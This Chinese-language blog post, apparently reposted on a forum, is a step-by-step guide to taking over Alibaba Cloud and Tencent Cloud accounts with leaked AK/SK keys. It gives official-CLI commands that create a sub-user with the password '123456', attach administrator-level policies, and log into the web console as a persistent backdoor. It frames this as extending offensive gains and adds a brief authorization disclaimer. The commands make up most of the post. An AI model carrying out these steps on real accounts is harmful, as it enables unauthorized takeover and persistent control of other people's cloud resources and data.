怎样利用官方工具+ak,sk接受云平台
怎样通过ak,sk登录云平台在云计算中,AK(Access Key)和SK(Secret Key)通常用于进行 API 调用,以便访问和管理云服务资源。这些密钥对于安全性至关紧张,由于它们允许对云资源实行各种操纵。假如泄露或不当利用,大概会导致严峻的安全风险和数据泄露。
而在实战中,大部门文章基本是什么工具一把嗦嗦哈,看oss,rds,ecs,其实假如ak,sk权限过大,是可以创建子用户来登录云管的,说不定登进去就能接受域名,im服务等扩大攻防成果。
下面介绍腾讯云,阿里云的接受方式,其他云大差不差,看官方文档就能搞
阿里云
阿里云有一个ram账号,可以看看他的官方介绍
https://i-blog.csdnimg.cn/blog_migrate/1ccb2999834f228b92f723502299679c.png
RAM用户由阿里云账号(主账号)或具有管理员权限的其他RAM用户,同时ram账号可以用ak,sk进行调用api创建
根据阿里云官方的命令行工具https://github.com/aliyun/aliyun-cli/blob/master/README-CN.md
配置 ak sk
./aliyun configure --profile akprofile
https://i-blog.csdnimg.cn/blog_migrate/e4eed429d3d26e4b837a35f05204afe2.png
创建ram账号
查看别名
./aliyun ram GetAccountAlias
常见账号
./aliyun aliyun ram CreateUser --UserName SxfnbQaxsb2333
设置密码
./aliyun ram CreateLoginProfile --UserName SxfnbQaxsb2333 --Password 123456
设置权限
./aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName SxfnbQax**2333 创建好账号后,查察该云的别名
./aliyun ram GetAccountAlias 获取id放在域名后面
https://i-blog.csdnimg.cn/blog_migrate/8fa9795fa8597889faf13e04b8bda2ab.png
登录账号为
创建的用户@+别名+.onaliyun.com
然后就可以用这个账号正常登录阿里云,和你自己账号登录阿里云一样
https://i-blog.csdnimg.cn/blog_migrate/839098e624bf63177191da6910c42917.png
腾讯云
腾讯云也一样,只不外叫法不同,腾讯云叫子用户,与阿里云不同的是,腾讯云登录子用户需要主账号id才可以
https://i-blog.csdnimg.cn/blog_migrate/136a1893b575070e2e8e46ef28eaa648.png
我们下载其官方命令行工具https://github.com/TencentCloud/tencentcloud-cli
查察命令行命令
获取主用户id
tccli cam GetUserAppId --cli-unfold-argument
https://i-blog.csdnimg.cn/blog_migrate/ea1f81a933905e08b4dd9b291a504d31.png
https://i-blog.csdnimg.cn/blog_migrate/bdbe21f809473cd96752c23a83647e71.png
创建子用户
tccli cam AddUser –cli-unfold-argument --Name Sxfnb2333 --Remark sxf --ConsoleLogin 1 --Password '123456' --NeedResetPassword 0
查询策略
tccli cam ListPolicies --cli-unfold-argument
给最高权限
tccli cam AttachUserPolicy --cli-unfold-argument --PolicyId 1 --AttachUin 100035117703
列出子用户
tccli cam ListUsers --cli-unfold-argument 创建好后然后去登录
https://i-blog.csdnimg.cn/blog_migrate/5127c32e82c6872d1b7c68d80c0e9785.png
更多网络安全优质免费学习资料与干货教程看主页简介加v。
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行负担,与本号及作者无关,请谨记守法。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]